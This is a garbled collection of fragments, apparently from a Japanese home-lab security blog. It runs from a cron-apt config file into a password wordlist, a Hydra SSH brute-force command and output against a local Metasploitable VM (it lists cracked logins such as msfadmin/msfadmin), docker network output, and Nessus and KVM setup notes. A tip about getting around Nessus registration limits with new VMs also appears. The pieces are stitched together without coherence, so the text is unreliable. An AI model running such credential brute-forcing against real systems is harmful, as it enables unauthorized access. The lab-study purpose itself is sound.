# Configuration for cron-apt. For further information about the possible
# configuration settings see /usr/share/doc/cron-apt/README.gz.
APTCOMMAND="/usr/bin/apt-get"
ACTIONDIR="/etc/cron-apt/action.d"
MAILTO="mail@sample.com"
MAILON="changes"
DEBUG="changes"
SYSLOGON="always"
OPTIONS="-o quiet=1"
user
password
12345678
msfadmin
root
guest
batman
asdfasdf
tomcat
解析結果は以下のようになった。
┌──(tcbn㉿kali)-[~/Documents/Study_attack/ssh_login]
└─$ hydra -L user.lst -P pass.lst -t 4 192.168.100.161 ssh > hydra_ssh
┌──(tcbn㉿kali)-[~/Documents/Study_attack/ssh_login]
└─$ cat hydra_ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-11 14:00:57
[DATA] max 4 tasks per 1 server, overall 4 tasks, 80 login tries (l:8/p:10), ~20 tries per task
[DATA] attacking ssh://192.168.100.161:22/
[22][ssh] host: 192.168.100.161 login: sys password: batman
[22][ssh] host: 192.168.100.161 login: msfadmin password: msfadmin
[22][ssh] host: 192.168.100.161 login: user password: user
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-11 14:01:24
tcbn@N14xZU:~$ docker network ls
NETWORK ID NAME DRIVER SCOPE
8b1cc3352942 bridge bridge local
9aa1455f82a9 host host local
03cbc1bfd02b kali-network bridge local
2f4c77efe200 none null local
Created symlink /etc/systemd/system/nessusd.service → /lib/systemd/system/nessus
d.service.
Created symlink /etc/systemd/system/multi-user.target.wants/nessusd.service → /l
ib/systemd/system/nessusd.service.
- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
- Then go to https://vm-ubuntu:8834/ to configure your scanner
次に、nessusd.service を起動する。
sudo systemctl start nessusd
そして、ブラウザから https://localhost:8834/ にアクセスする。
このように警告が出されるが、Advanced をクリックし、Accept the Risk and Continue とすると、以下のようなセットアップ画面になる。
スナップショットを活用しないまま進めてしまい、登録できるホスト数で詰まってしまうこともあるかもしれない。そんなときは、思い切って新しい仮想マシンを作成する、ということを考える。流石に新しい仮想マシンまでは IP アドレスの制限はなされないだろう。ここではメールアドレスは同じものを用いた場合で試してみる。
ここまで準備した上で、KVMにMetasploitableを導入する。導入方法については海外の方の記事で参考になるものがあった4。
Virtual Machine Manager を開き、"Create a new virtual machine" で、"Import existing disk image" を選択し、次に進む。